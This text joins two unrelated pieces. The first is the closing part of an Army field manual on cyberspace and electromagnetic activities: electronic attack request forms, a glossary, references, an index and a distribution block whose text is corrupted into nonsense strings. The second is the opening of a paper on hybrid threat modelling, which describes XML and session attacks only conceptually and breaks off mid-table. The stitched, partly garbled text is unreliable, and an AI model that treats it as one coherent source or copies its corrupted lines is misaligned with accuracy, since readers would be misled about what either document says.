mission,  and coordination  efforts  required  for mission  success.  Relate  the impact of  mission  success to  specific  
objectives  for the integrated  tasking  order.  
Electronic  Attack  (EA) Concept  of Operations: Define  desired  effect(s)  and timeline.  
Cease  Buzzer  Procedures: This  will be in accordance  with theatre special  instructions  (SPINS). Provide  frequency to 
communicate  between  jamming  control  authority (JCA)  and EA asset. Very/ultra -high frequency  (V/UHF)  is the primary  
means to talk to a supporting  aircraft. If unable  to establish  communications, consider  using  another  asset to relay  
information.  Some  aircraft  may be Internet Relay Chat (IRC)  client  (mIRC)  capable.  
Friendly Frequency Use for Operation:  
 
 
Target  Communication s System(s)  to 
be Jammed/Denied:  Target  Requested  (List type  and frequency,  if known. ) 
 
Intelligence  Assessment  (Intelligence  assessment  required  for each  
request.  Do not copy and  paste  frequencies from one day to the next 
without  intelligence  validation/assessment .) 
Target  Location  (in Lat/Long  or military grid  reference  system  [MGRS]):  
Jamming  date-time group(s): From  – To, in Zulu Time  (preferred)  
Type  of EA Requested: Preplanned  – Scheduled /On-Call 
 
  
Appendix D 
D-2 FM 3-12  11 April 2017 ELECTRONIC ATTACK 5 LINE 
D-2. Request immediate and on-call EA requests using a 5-line format. This is used to prepare the aircrew 
for an EA. For more information on this format see ATP 3-09.32. (See table D-2 for an example of the EA 
5-line briefing format.) 
Table D-2. The electronic attack 5-line briefing 
Electronic Attack 5 -Line Briefing
Do not transmit line numbers. Units of measure are standard unless briefed.  
Lines 1, 2 and 4 are mandatory readback(*). J am Control Authority (JCA) may request additional readback.  
JCA: “___________________________________,  this is _______________________________________”  
 (Aircraft Callsign)                                                           (J CA Callsign)  
“Type 3 Control”  
1.* Target/ Effect Description:“_______________________________________________________________”  
A. Rapper/ Target Name (if applicable, not required)  
B. Frequency (if known)  
C. Modulation (if known, not required)  
2.* Target Location: “________________________________________________________” (Lat/Long, MGRS)  
3. Location of Friendlies: “___________________________________________________________________”
4.* Time on Target: “ _____________________________________________________________ __________”  
5. Remarks (as appropriate): “________________________________________________________________”
 
11 April 2017  FM 3 -12 Glossary -1 Glossary  
The glossary lists acronyms and terms with Army, multi -Service, or joint definitions, 
and other selected terms. Where Army and joint definitions are different, (Army) 
follows the term. The proponent publication for a term is listed in parentheses after the 
definition.  
SECTION I – ACRONYMS AND ABBREVI ATIONS  
ARCYBER  
CEMA  
CERF  
COA  
DCO  
DCO -IDM  
DCO -RA 
DOD  
DODIN  
DODIN -A 
EA 
EARF  
EMS  
EMSO  
EP 
ES 
EW 
EWO  
G-2 
G-3 
G-5 
G-6 
G-9 
IO 
IPB 
IRC 
J-3 
JFC 
MDMP  
OCO  
OPE  
ISR 
SCIF  
SIGINT  
SMO  
USC  
USCYBERCOM  United States Army Cyber Command  
cyber space  electromagnetic activities  
cyber effects  request format  
course of action  
defensive cyberspace operations  
defensive cyberspace operations – internal defensive measures  
defensive cyberspace operations – response action  
Department of Defense  
Department of Defense information network  
Department of Defense information network - Army  
electronic attack  
electronic attack request format  
electromagnetic spectrum  
electromagnetic spectrum operations  
electronic protection  
electronic warfare support  
electronic warfare  
electronic warfare officer  
assistant chief of staff, intelligence  
assistant chief of staff, operations  
assistant chief of staff, plans  
assistant chief of staff, signal  
assistant chief of staff, civil affairs operations  
information operations  
intelligence preparation of the battlefield  
information -related capabilities  
operations directorate of a joint staff  
joint force command er 
military desion -making process  
offensive cyberspace operations  
operational preparation of the environment  
intelligen ce, surveillance , & reconnaissance  
sensitive compartmented information facility  
signals intelligence  
spectrum management operations  
United States Code  
United States Cy ber Command  
 
Glossary   
Glossary -2 FM 3 -12 11 April 2017  SECTION II – TERMS  
aimpoint  
A point associated with a target and assigned for a specific weapon impact . (JP 3 -60) 
Army design methodology  
A methodology for applying critical and creative thinking to understand, visualize, and describe 
unfamiliar problems and approaches to solving them . (ADP 5 -0) 
countermeasures  
That form of military science that, by the employment of devices and/or techniques, has as its objective 
the impairment of the operational effectiveness of enemy activity. (JP 3 -13.1)   
cyber space  electromagnetic activities  
The process of planning, integrating, and sync hronizing cyberspace and electronic warfare operations 
in support of unified land operations.  (ADRP 3 -0) 
cyberspace  
A global domain within the information environment consisting of the interdependent network of 
information technology infrastructures and re sident data, including the Internet, telecommunications 
networks, computer systems, and embedded processors and controllers. (JP 3 -12[R])  
cyberspace operations  
The employment of cyberspace capabilities where the primary purpose is to achieve objectives in or 
through cyberspace. (JP 3 -0) 
cyberspace superiority  
The degree of dominance in cyberspace by one force that permits the secure, reliable conduct of 
operations by that force, and its related land, air, maritime, and space forces at a given time and place  
without prohibitive interference by an adversary. (JP 3 -12[R])  
defensive cyberspace operations  
Passive and active cyberspace operations intended to preserve the ability to utilize friendly cyberspace 
capabilities and protect data, networks, net -centric c apabilities, and other designated systems. (JP 3 -
12[R])  
defensive cyberspace operation response action  
Deliberate, authorized defensive measures or activities taken outside of the defended network to 
protect and defend the Department of Defense cyberspace  capabilities or other desiganted systems. (JP 
3-12[R])  
denial operations  
Actions to hinder or deny the enemy the use of space, personnel, supplies, or facilities. (FM 3 -90-1) 
Department of Defense information network  
The set of information capabilities, a nd associated processes for collecting, processing, storing, 
disseminating, and managing information on -demand to warfighters, policy makers, and support 
personnel, whether interconnected or stand -alone, including owned and leased communications and 
comput ing systems and services, software (including applications), data, security services, other 
associated services, and national security systems. (JP 6 -0) 
Department of Defense information network operations  
Operations to design, build, configure, secure, op erate, maintain, and sustain Department of Defense 
networks to create and preserve information assurance on the Department of Defense information 
networks. (JP 3 -12[R])  
destroy  
A tactical mission task that physically renders an enemy force combat -ineffective until it is 
reconstituted. Alternatively, to destroy a combat system is to damage it so badly that it cannot perform 
any function or be restored to a usable condition without being entirely rebuilt. (FM 3 -90-1) 
Glossary  
11 April 2017  FM 3 -12 Glossary -3 directed energy  
(DOD) An u mbrella term covering technologies that relate to the production of a beam of concentrated 
electromagnetic energy or atomic or subatomic particles. Also called DE. (JP 3 -13.1)  
disrupt  
1. A tactical mission task in which a commander integrates direct and in direct fires, terrain, and 
obstacles to upset an enemy’s formation or tempo, interrupt his timetable, or cause enemy forces to 
commit prematurely or attack in piecemeal fashion. 2. An obstacle effect that focuses fire planning and 
obstacle effort to cause the enemy to break up his formation and tempo, interrupt his timetable, commit 
breaching assets prematurely, and attack in a piecemeal effort. (FM 3 -90-1) 
electrmagnetic compatibility  
(DOD) The ability of systems, equipment, and devices that use the electr omagnetic spectrum to 
operate in their intended environments without causing or suffering unacceptable or unintentional 
degradation because of electromagnetic radiation or response. Also called EMC. (JP 3 -13.1)  
electromagnetic hardening  
(DOD) Action taken to protect personnel, facilities, and/or equipment by blanking, filtering, 
attenuating, grounding, bonding, and/or shielding against undesirable effects of electromagnetic 
energy. (JP 3 -13.1)  
electromagnetic interference  
(DOD) Any electromagnetic disturban ce, induced intentionally or unintentionally, that interrupts, 
obstructs, or otherwise degrades or limits the effective performance of electronics and electrical 
equipment. (JP 3 - 13.1)  
electromagnetic intrusion  
(DOD) The intentional insertion of electroma gnetic energy into transmission paths in any manner, with 
the objective of deceiving operators or of causing confusion. (JP 3 -13.1)  
electromagnetic jamming  
(DOD) The deliberate radiation, reradiation, or reflection of electromagnetic energy for the purpose  of 
preventing or reducing an enemy’s effective use of the electromagnetic spectrum, and with the intent 
of degrading or neutralizing the enemy’s combat capability. (JP 3 -13.1)  
electromagnetic pulse  
(DOD) The electromagnetic radiation from a strong electronic pulse, most commonly caused by a 
nuclear explosion that may couple with electrical or electronic systems to produce damaging current 
and voltage surges. Also called EMP. (JP 3 -13.1)  
electromagnetic spectrum  
The range of frequencies of electromag netic radiation from zero to infinity. It is divided into 26 
alphabetically designated bands. (JP 3 -13.1)  
electromagnetic spectrum management  
Planning, coordinating, and managing use of the electromagnetic spectrum through operational, 
engineering, and adm inistrative procedures. (JP 6 -01) 
electronic intelligence  
(DOD) Technical and geolocation intelligence derived from foreign noncommunications 
electromagnetic radiations emanating from other than nuclear detonations or radioactive sources. Also 
called ELINT . (JP 3 -13.1)  
electronic masking  
(DOD) The controlled radiation of electromagnetic energy on friendly frequencies in a manner to 
protect the emissions of friendly communications and electronic systems against enemy electronic 
warfare support measures/signa ls intelligence without significantly degrading the operation of friendly 
systems. (JP 3 -13.1)  
Glossary 
Glossary-4 FM 3-12  11 April 2017 electronic probing 
(DOD) Intentional radiation designed to be introduced into the devices or systems of potential enemies 
for the purpose of learning the functions and operational capabilities of the devices or systems. (JP 3-
13.1) 
electronic reconnaissance 
The detection, location, identification, and evaluation of foreign electromagnetic radiations. (JP 3-13.1) 
electronics security 
(DOD) The protection resulting from all measures designed to deny unauthorized persons information 
of value that might be derived from their interception and study of noncommunications 
electromagnetic radiations, e.g., radar. (JP 3-13.1) 
electronic warfare 
Military action involving the use of electromagnetic and directed energy to control the electromagnetic 
spectrum or to attack the enemy. (JP 3-13.1) 
electronic warfare reprogramming 
(DOD) The deliberate alteration or modification of electronic warfare or target sensing systems, or the 
tactics and procedures that employ them, in response to validated changes in equipment, tactics, or the 
electromagnetic environment. (JP 3-13.1) 
electro-optical-infrared countermeasures 
(DOD) A device or technique employing electro-optical-infrared materials or technology that is 
intended to impair the effectiveness of enemy activity, particularly with respect to precision guided 
weapons and sensor systems. Also called EO-IR CM. (JP 3-13.1) 
emission control 
(DOD) The selective and controlled use of electromagnetic, acoustic, or other emitters to optimize 
command and control capabilities while minimizing, for operations security: a. detection by enemy 
sensors; b. mutual interference among friendly systems; and/or c. enemy interference with the ability to 
execute a military deception plan. Also called EMCON. (JP 3-13.1) 
information environment 
The aggregate of individuals, organizations, and systems that collect, process, disseminate, or act on 
information. (JP 3- 13) 
information operations 
The integrated employment, during military operations, of information-related capabilities in concert 
with other lines of operation to influence, disrupt, corrupt, or usurp the decision-making of adversaries 
and potential adversaries while protecting our own. (JP 3-13) 
intelligence preparation of the battlefield 
(Army) The systematic process of analyzing the mission variables of enemy, terrain, weather, and civil 
considerations in an area of interest to determine their effect on operations . (ATP 2-01.3) 
key terrain 
Any locality, or area, the seizure or retention of which affords a marked advantage to either combatant. 
(JP 2-01.3) 
measure of effectiveness 
A criterion used to assess changes in system or enemy behavior, capability, or operational environment 
that is tied to measuring the attainment of an endstate, achievement of an objective, or creation of an 
effect. (JP 3-0)  
offensive cyberspace operations 
Cyberspace operations intended to project power by the application of force in or through cyberspace. 
(JP 3-12[R])  
Glossary  
11 April 2017  FM 3 -12 Glossary -5 operatio nal environment  
A composite of the conditions, circumstances, and influences that affect the employment of 
capabilities and bear on the decisions of the commander. (JP 3 -0) 
planning  
The art and science of understanding a situation, envisioning a desired future, and laying out effective 
ways of bringing that future about. (ADP 5 -0) 
radio frequency countermeasures  
(DOD) Any device or technique employing radio frequency materials or technology that is intended to 
impair the effectiveness of enemy activity, p articularly with respect to precision guided weapons and 
sensor systems. Also called RF CM. (JP 3 -13.1)  
situational understanding  
The product of applying analysis and judgment to relevant information to determine the relationships 
among the operational and  mission variables to facilitate decisionmaking. (ADP 5 -0) 
spectrum management operations  
The interrelated functions of spectrum management, frequency assignment, host nation coordination, 
and policy that together enable the planning, management, and execu tion of operations within the 
electromagnetic operational environment during all phases of military operations. (FM 6 -02) 
targeting  
The process of selecting and prioritizing targets and matching the appropriate response to them, 
considering operational req uirements and capabilities . (JP 3 -0) 
threat  
Any combination of actors, entities, or forces that have the capability and intent to harm United States  
forces, United States national interests, or the homeland.  (ADRP 3 -0) 
wartime reserve modes  
(DOD) Characteristics and operating procedures of sensor, communications, navigation aids, threat 
recognition, weapons, and countermeasures systems that will contribute to military effectiveness if 
unknown to or misunderstood by opposing commanders before they are used, but could be exploited or 
neutralized if known in advance. Also called WARM. (JP 3 -13.1)
This page intentionally left blank.   
11 April 2017 FM 3-12  References-1 References 
REQUIRED PUBLICATIONS 
These documents must be available to intended users of this publication. 
ADRP 1-02. Terms and Military Symbols. 16 November 2016. 
DOD Dictionary of Military and Associated Terms . March 2017. 
RELATED PUBLICATIONS 
These documents contain relevant supplemental information. 
JOINT AND DEPARTMENT OF DEFENSE PUBLICATIONS 
Most joint publications are available online: http://www.dtic.mil/doctrine/new_pubs/jointpub.htm . 
CJCSI 3370.01B . Target Development Standards . 6 May 2016. 
CJCS Manual 3139.01. (U) Review and Approval Process for Cyberspace Operations (S/NF) . 22 
October 2013. 
CJCS Manual 3320.02D . Joint Spectrum Interference Resolution (JSIR) . 3 June 2013. 
DODI 4650.01 . Policy and Procedures for Management and Use of the Electromagnetic Spectrum . 9 
January 2009. 
DoD Manual 5240.01 . Procedures Governing the Conduct of DOD Intelligence Activities . 8 August 
2016 . 
JP 2-0. Joint Intelligence . 22 October 2013. 
JP 2-01.3 . Joint Intelligence Preparation of the Operational Environment . 21 May 2014. 
JP 3-0. Joint Operations . 17 January 2017.  
JP 3-12(R). Cyberspace Operations . 5 February 2013. 
JP 3- 13. Information Operations . 27 November 2012. 
JP 3- 13.1. Electronic Warfare . 8 February 2012. 
JP 3-60. Joint Targeting . 31 January 2013. 
JP 5-0 . Joint Operation Planning . 11 August 2011 . 
JP 6-0 . Joint Communications System . 10 June 2015. 
JP 6- 01. Joint Electromagnetic Spectrum Management Operations . 20 March 2012 . 
ARMY PUBLICATIONS 
Most Army doctrinal publications are available online: www.apd.army.mil . 
ADP 2-0 . Intelligence . 31 August 2012.  
ADP 3-0 . Operations . 11 November 2016.  
ADP 5-0 . The Operations Process . 17 May 2012.  
ADP 6-0. Mission Command . 17 May 2012 .  
ADRP 2-0. Intelligence . 31 August 2012.  
ADRP 3-0. Operations . 11 November 2016 .  
ADRP 5-0. The Operations Process . 17 May 2012.  
ADRP 6-0 . Mission Command . 17 May 2012. 
AR 5-12. Army Use of the Electromagnetic Spectrum.  16 February 2016 
AR 380-5. Department of the Army Information Security Program . 29 September 2000. 
AR 380-10. Foreign Disclosure and Contacts with Foreign Representatives . 14 July 2015. 
AR 381- 10. U.S. Army Intelligence Activities . 3 May 2007.  
AR 530-1 . Operations Security . 26 September 2014. 
References   
References -2 FM 3 -12 11 April 2017  ATP 2 -01.3. Intelligence, Preparation of the Battlefield/Battlespace . 10 November 2014.  
ATP 3 -09.32 /MCRP 3 -16.6A/NTTP 3 -09.2/AFTTP 3 -2.6. JFIRE Multi -Service Tactics, Techniques, 
and Procedures for t he Joint Application of Firepower . 21 January  2016. 
ATP 3 -13.10 /NTTP 3 -51.2/AFTTP 3 -2.7. EW Reprogramming Multi -Service Tactics, Techniques, and 
Procedures for Reprogramming Electronic Warfare (EW) Systems . 17 June 2014 . 
ATP 3 -36. Electronic Warfare Techni ques. 16 December 2014.  
ATP 3 -60. Targeting . 7 May 2015 . 
ATP 5 -0.1. Army Design Methodology . 1 July 2015 . 
ATP 5 -19. Risk Management . 14 April 2014.  
ATP 6 -02.70 . Techniques for Spectrum Management Operations . 31 December 2015 . 
FM 2 -0. Intelligence  Operations . 15 April 2014.  
FM 3 -13. Inform ation Operations . 6 December  2016.  
FM 3 -55. Information Collection . 3 May 2013 . 
FM 3 -90-1. Offense and Defense Volume 1 . 22 March 2013 . 
FM 3 -94. Theater Army, Corps, and Division Operations . 21 April 2014 . 
FM 6 -0. Command er and Staff Organization and Operations . 5 May 2014.  
FM 6 -02. Signal Support to Operations . 22 January 2014.  
FM 27 -10. The Law of Land Warfare . 18 July 1956.  
OTHER PUBLICATIONS  
Army Strategic Planning Guidance.  2014. http://www.g8.army.mil/index.html  
Executive Order 12333. United States Intelligence Activities.  4 December 1981. 
https://www.archives.gov /federal -register/codification  
Strategic Instruction 714 -04. Satellite Communications . 14 October 2014.  
https://vela.stratcom.mil/sites/publications/Pubs/SIs/714 -04.pdf  
Trilat eral Memorandum of Agreement among the Department of Defense and the Department of 
Justice and the Intelligence Community regarding Computer Network Attack and Computer 
Network Exploitation Activities ( S/NF) . 9 May 2007. 
United States Code.  http://uscode.house.gov/  
United States Constitution.  https://www.whitehouse.gov/1600/constitution  
PRESCRIBED FORMS  
None .  
REFERENCED FORMS  
DA Forms are available on the Army Publishing Directorate ( APD) web site: www.apd.army.mil . 
DD Forms are available on the Office of the Secretary of Defense (OSD) web site: 
http:/ /www.dtic.mil/whs/directives/forms/index.htm . 
DA Form 2028. Recommended Changes to Publications and Blank Forms . 
DD Form 1494. Application for Equipment Frequency Allocation .  
 
 
11 April 2017  FM 3 -12 Index -1 Index  
Entries are by paragraph number unless indicated otherwise .
A 
aimpoints, 3 -59 
army design methodology, 3 -
38 
assistant chief of staff, G -2 (S-
2), intelligence, 3 -26 
assistant chief of staff, G -6 (S-
6), signal, 3 -24 
authorities, 1 -87 
C 
cognitive dimension, 1 -56 
countermeasures, 1 -109 
cyber effects request format  
CERF, 1-38, 3 -4, 3-17, 3 -
18, 3 -21, 3 -50, 3 -53, C-1 
preparation, C -8 
cyberspace, 1 -10 
Army, 1 -19 
characteristics, 1 -62 
effects, 1 -45 
risk, 1 -78 
cyberspace actions, 1 -21 
cyberspace attack, 1 -43 
cyberspace capability, 1 -10 
cyberspace defense, 1 -40 
cyberspace domain, 1 -12 
cyberspace electromagnetic 
activities, 1-5 
CEMA, 3 -1 
commanders, 3 -9 
resources, 3 -11 
staff, 3 -15 
cyberspace electromagnetic 
activities section  
CEMA section, 3 -20 
cyberspace electromagnetic 
activities working group  
CEMA working group, 3 -30 
cyberspace intelligence, 
surveillance & 
reconnaissance  
cyberspace ISR, 1 -41 
cyberspace layers, 1 -57 
cyberspace missions, 1 -21 
cyberspace operational 
preparation of the 
environment  
cyberspace OPE, 1 -42 
cyberspace operations, 1 -10 cyberspace security, 1 -44 
cyberspace superiority, 1 -5, 1-
11 
D 
defensive cyberspace 
operations  
DCO, 1 -28 
defensive cyberspace 
operations internal defensive 
measures  
DCO -IDM, 1 -33 
defensive cyberspace 
operations response action  
DCO -RA, 1 -35 
defensive electronic attack, 1 -
108 
Department of Defense 
information network  
DODIN,  1-5, 1-13, 1 -17,1-
19,1-23,1-24         
DODIN -A, 1-4, 1-25   
DODIN operations, 1 -27 
space, 2 -15 
directed energy, 1 -105 
E 
effects approval, C -3 
electromagnetic compatibility, 
1-122 
electromagnetic deception, 1 -
112 
electromagnetic hardening, 1-
123 
electromagnetic interferen ce, 
1-135 
electromagnetic intrusion, 1 -
113 
electromagnetic jamming, 1 -
114 
electromagnetic pulse, 1 -116 
electromagnetic spectrum  
EMS, 1 -51 
electromagnetic spectrum 
management, 1 -125 
electromagnetic spectrum 
operations  
EMSO, 1 -103 
electronic attack  
EA, 1 -104  
actions, 1 -108 considerations, 1 -145  
electronic attack 5 -line request, 
D-2 
electronic attack request format  
EARF, D -1 
electronic intelligence, 1 -132 
electronic masking, 1 -125 
electronic probing, 1 -115 
electronic protection  
EP, 1 -117  
actions, 1 -121 
cons iderations, 1 -154 
electronic reconnaissance, 1-
133 
electronic warfare   
EW, 1-103 
electronic warfare 
considerations, 1 -137  
airborne, 1 -141  
ground, 1 -138  
electronic warfare coordination, 
1-164 
electronic warfare officer  
EWO, 3-21 
electronic warfare personnel  
EW noncommissioned 
officer, 3 -22 
EW technician, 3 -22 
electronic warfare 
reprogramming, 1 -136 
considerations, 1 -158 
electronic warfare support  
ES, 1 -128 
actions, 1 -131 
considerations, 1 -157 
electro -optical -infrared 
countermeasures, 1 -110 
emission control, 1 -126 
F 
fire support, 3 -28 
frequency interference 
resolution, 1 -166 
H 
host nation considerations, A -
12 
I 
information collection, 2 -10 
information environment, 1 -53 
Index  
Index -2 FM 3 -12 11 April 2017  information operations  
IO, 2 -3 
information operations officer, 
3-27 
informational dimension, 1 -55 
installation considerations, A -
13 
intelligence  
inter-relation, 2 -5 
intelligence preparation of the 
battlefield  
IPB, 2 -6 
interagency considerations, A -
6 
intergovernmental 
considerations, A -6 
J 
joint operations, A -1 
K 
key terrain, 1 -75 
M 
measures of effectiveness, 3 -
75, 3-76 
measures of performance, 3-72, 
3-73 
military decision -making 
process  
MDMP, 3 -41 MDMP Step 1, 3 -43 
MDMP Step 2, 3 -44 
MDMP Step 3, 3 -47 
MDMP Step 4, 3 -49 
MDMP Step 5, 3 -51 
MDMP Step 6, 3 -52 
MDMP Step 7, 3 -53 
mission variables, 1 -77 
multinational considerations, A -
7 
N 
node, 1 -73 
nongovernmental organizations 
considerations, A -11 
O 
offensive cyberspace 
operations  
OCO, 1 -37 
operational environment, 1 -68 
operational risks, 1 -80 
operational variables, 1 -76 
operations orders, B -1 
operations security risks, 1 -85 
P 
physical dimension, 1 -54 
policy risk, 1 -82 
private industry considerations, 
A-15 R 
radio frequency 
countermeasures, 1 -111 
S 
situational understanding, 1 -71 
space operations, 2 -11 
spectrum management, 1 -157 
spectrum management 
operations  
SMO, 1 -20, 1-51, 1 -160 
spectrum manager  
CEMA section, 3 -23 
G-6 (S-6), 3-25 
staff judge advocate, 3 -29 
T 
targeting, 2 -17, 3-54 
targeting process  
assess, 3 -70 
decide, 3 -60 
deliver, 3 -68 
detect, 3 -65 
technical risks, 1 -81 
threat, 1 -86 
U 
United States Code, 1 -91 
W 
wartime reserve modes, 1 -127 
 
By Order of the Secretary of the Army 
0$5.$0,//(<
General, United States Army
Chief of Staff 
Official:
GERALD B. O’KEEFE
Administrative Assistant to the 
Secretary of the Army

)0 
11$SULO
DISTRIBUTION:
Active Army, Army National Guard, and United States Army Reserve: 7REHGistributed in 
DFFRUGDQFHZLWKWKH LQLWLDOGLVWUXEXWLRQQXPEHU,'1 UHTXLUHPHQWVIRU )0
PIN: 201561 -000 
 
 
A Hybrid Approach to Threat Modelling  
Author: Sriram Krishnan, sriram.krishnan@in.pega.com  
Date:  25-Febraury -2017  
 
Abstract  
 
Threat Modelling is considered the fundamental  approach  in identify ing security 
weakness in software application s during  the design phase in Software Development 
Lifecycle process . Various techniques have been  published for performing threat 
modelling including  STRIDE, Attack Tree, and Attack Library. Organizations tend to 
lean towards a single technique to perform their modelling exercise. Each of these 
techniques is weighed down by  limitations, hence when implemented individually 
impact s the effectiveness  and comprehensiveness of the exercise. However, i n order to 
achieve meaningful output it is imperative to use each of these technique s appropriately  
to the corresponding activity in the threat modelling exercise . This paper analyses the 
vario us limitations in each of these techniques and presents a hybrid model that 
eliminates these limitations by adopting a structured approach, capturing  optimum 
details, and represent ing the data in an intelligible way.    
 
 
A Hybrid Approach to Threat Modelling  2 
 
 
1. Introduction  
The current business world is Information Centric. Information is critical, 
information is money and information is at large. All the more , it is transacted over the 
internet. It requires no additional motivation for any group to obtain the information to 
monetise or use for other purposes that would benefit them. It goes without saying that 
it is the inherent responsibility of an organization to provide a secure operating 
environment for their customers and employees  to protect their interest. At this state it 
is an eternal obligation of any organization to look at security just not as a function but 
a key business driver .  
Threat modelling is the fundamental buildi ng block for building secure software . 
Unless one  understand s the threats that they are e xposed to in a structured way, it will 
not be possible to  build a secure operative environment  and software . It is needless to 
say that threats grow along with evolution of technology and delivery models. A SANS 
survey (2015 State of Application Security: Closing the Gap  [1]) indicate s that threat 
assessment (which can also be referred to as threat modelling) is the second leading 
application security practise (next to penetration testing) for building secure  web 
applications. Thus threat modelling is a pro-active security practice that organizations 
should adopt.    
2. Threat Modelling  
2.1 An Overview  
Let us assume that an organization is tasked to build a payment processing  
application . This application is required  to integrate with external applications , transmit 
and store sensitive data such as customer’s SSN, credit card and debit card details. One 
of the top priorities for the organization is  to bake security into the application . Some 
of the questions that need to be addressed by the security office upfront are: 
 Where to start?  
 How to identify the threats?  
 What are the targets of an attacker?  
 Who could  attack  and how can they attack?  
A Hybrid Approach to Threat Modelling  3 
 
 
  How  should the organization  defend?  
When any organization plans to build  a new application , add features to an existing  
applicatio n or change their delivery model (move to cloud) , their primary  objective  
should be to  build a secure design  for the application. Threat Modelling is a technique 
that helps achieve this objective  in a simplified and structured way.  
Following diagram  depicts in simple terms what threat modelling  is:  
 
In a threat modelling exercise we enumerate the threats, which could be caused 
by a vulnerability, which could be realized through an attack, which could be mitigat ed 
via countermeasure.  
2.2 Types of Threat Modelling  
Threat modelling is a structured procedure  for identifying  and categorizing 
threats , and enumerating  threat  scenarios  require in-depth  understand ing of  the 
architecture and underlying technology stack.    
At a broad level there are 3 types of threat modelling techniques:  
 STRIDE – Spoofing, Tampering, Repudiation, Information Disclosure, Denial -of-
Service, and Elevation of Privilege  
 Attack Trees  
 Attack Libraries  
 
Threats
Probability of 
occurance of an 
adverse incidentVulnerabilities
What is the cause 
of attack?Attacks
How it is going to 
happen?Countermeasures
How to defend / 
prevent the attack?
Figure 1 – Threat Modelling  
A Hybrid Approach to Threat Modelling  4 
 
 
2.2.1  STRIDE  
The STRIDE approach to threat modelling  was invented by Lor en Kohnfelder 
and Praerit Garg in 1999  [2]. This technique helps in the  enumerat ion of  threats based 
on attack properties. For each of these attack properties there is set of security themes 
violated  as illustrated in the following table:  
Attack Property  Security Theme  
Spoofing  Authentication  
Tampering  Integrity  
Repudiation  Non-Repudiation  
Information Disclosure  Confidentiality  
Denial -of-Service  Availability  
Elevation of Privilege  Authorization  
       
Threats are enumerated by considering each attack property and its 
corresponding impacted  security theme. Consider  a Software as a Service ( SaaS ) 
application that does pay -roll processing  for various  organizations. The application 
transmit s and store s sensitive  details such as employee’s salary data.  The system also 
integrate s with its customer ’s network for authentication and obtain ing Human 
Resource Management System ( HRMS ) data for payment  processi ng. Below table 
provides an example of threat analysis for this  application using STRIDE:  
Attack Property  Threat Scenarios  Security Theme  
Spoofing  An attacker can hijack a session id of a user and 
submit request to obtain the user’s  payroll details.  Authentication  
Tampering  An attacker can intercept and  modify salary data  
as it is transmitted via  SSL v2 which uses weak 
algorithms for encryption.  Integrity  
Repudiation  An attacker who also happens to be an employee 
can modify the ir own  salary details by capturing 
and replaying the original request submitted by 
the organization.  Non-Repudiation  Table 1 – STRIDE Attack Properties  
A Hybrid Approach to Threat Modelling  5 
 
 
 Information 
Disclosure  An attacker can obtain salary data upon access to 
database as they are stored as plain text in the 
database.  Confidentia lity 
Denial -of-Service  An attacker programmatically sends a large 
number  of HTTP GET / POST request s designed 
to consume significant amount of the server 
resources and result in denial -of-service 
condition.  Availability  
Elevation of 
Privilege  Application is vulnerable  to insecure direct object 
reference which allows an attacker to manipulate 
the parameter value that directly refers to 
resources  that can only be accessed by accounts 
with administrative privilege .  Authorization  
 
 Please note that the above table provides an example of how to use STRIDE to 
enumerate threat s but does not contain exhaustive set of threats given the context. Each 
attack property is mapped to th e application functionali ty to identify the threats. In a 
real-world scenario the entire ecosystem of application and its technology stack should 
also be taken into consideration during threat enumeration.  
  STRIDE approach has two variants:  STRIDE -per-Element and STRIDE -per-
Interaction.  
STRIDE -per-Element  [3] [4] : STRIDE -per-element strive s to achieve defence 
in depth. Table 2 provides a simplistic way to represent threat scenarios based on the 
attack properties. However , development teams typically sketch architecture diagrams 
or Data Flow Diagrams (DFD) based on the nature of the application being  developed. 
These diagrams (when developed in an appropriate manner) would serve as snapshot 
of the application’s ecosystem , indicating  the different eleme nts that interact with the 
application. Elements in  a DFD are as follows:  
External Entity : Represents the source from which the data is sent to the application or 
destination to which the application  sends the data . 
Data Flow : Represents the data flow from and to the application . 
Data Store : Represents the data at rest (database) . Table 2 – Threat Enumeration using STRIDE  
A Hybrid Approach to Threat Modelling  6 
 
 
 Process / Business Logic : Represents an action , activity or logic that transforms or 
operate s on the data . 
This technique should be used when the te am is motivated to find additional or 
intricate threats (on top of already identified threats) specific to the se elements. This 
method could be perceived as one which is tightly -coupled  with such element s. An 
organization should identify element s that need  further threat analysis . Continuing with 
the payroll application example, consider the following DFD:  
 
 
The above diagram illustrates two basic function s of the application : 
 Admin uploads bulk of employee salary data  
 Employee reque sts to view his salary details  
  From the  DFD  it is evident  that confidential data is transacted between user 
(admin and employee) and application , and that XML is used for transporting the data. 
Also , the application parses XML  data before storing the values  in the payroll details 
table . Another key point to note is that XML can present an attractive target for 
adversaries  as it has been widely used and susceptible to different types of attack . Thus 
data flow becomes one of the elements that need additional focus. To break down , let 
us consider the following two points to decide  whether an element represented in the 
DFD require s additional focus:  
 Criticality of the function from the perspective  of confidentiality, integrity, and 
availability  (business risk should also be taken into consideration)  
Figure 2 – DFD Diagram Payroll Application  
A Hybrid Approach to Threat Modelling  7 
 
 
  Degree of weakness or strength and the options available in the underlying 
technology to protect itself from security attacks  
Below table represents threat enumeration by adopting STRIDE -per-element:   
Element s Threat Scenario  S T R I D E 
Data Flow  An attacker will include nested entity expansion to 
produce amplified XML output that wi ll crash 
processor's CPU/memory ( XML Entity Expansion 
Attack )     ×  
Data Flow  An attacked will include an URI in the entity that will 
contain malicious code to read sensitive d ata from the 
application server ( XML External Entity Injection 
Attack )    ×   
Data Flow  An attacker is able to forge or alter the data by 
inserting malicious element in the XML (XML 
Signature Wrapping Attack )   ×    
Data Flow  An attacker is able to forge or alter XML data  by 
removing the Signature element  (XML Signature 
Exclusion Attack ) ×     × 
 
Since the focus is related  to data flow via XML, various threats relating to 
XML are enumerated so that defence in depth can be  achieved.   
STRIDE -per-Interaction  [5]: STRIDE -per-Interaction is the other  variant of 
STRIDE that attempts to further simplify threat modelling. This does  not mean that 
STRIDE-per-Element is complicated or STRIDE -per-Interaction will allow threat 
modellers to identify more threat s. All techniques can be used in conjunction to ar rive 
at the best possible result. The Approach to Threat Modelling section  will cover this 
aspect of threat modelling .  
A dictionary meaning of Interaction is a mutual or reciprocal action. In the 
context of threat modelling , this represents the flow of data between entities involved 
in the application. Understanding each interaction and application  flow provides  much 
needed insight for threat modellers to enumerate  threat s applicable to that  interaction. 
Thus addressing threats for  each applicati on workflow serves as an enabler in 
developing a more secure application .  Such an approach will deeply benefit the Table 3 – STRIDE -per-Element  
A Hybrid Approach to Threat Modelling  8 
 
 
 software developers as the threats will be documented as scenarios specific to that 
interaction . Continuing  with the same example, let  us further simplify the threat model:  
 
Elements  Interaction  Threat Scenario  S T R I D E 
Data Flow  Admin -> 
Application 
Interface for 
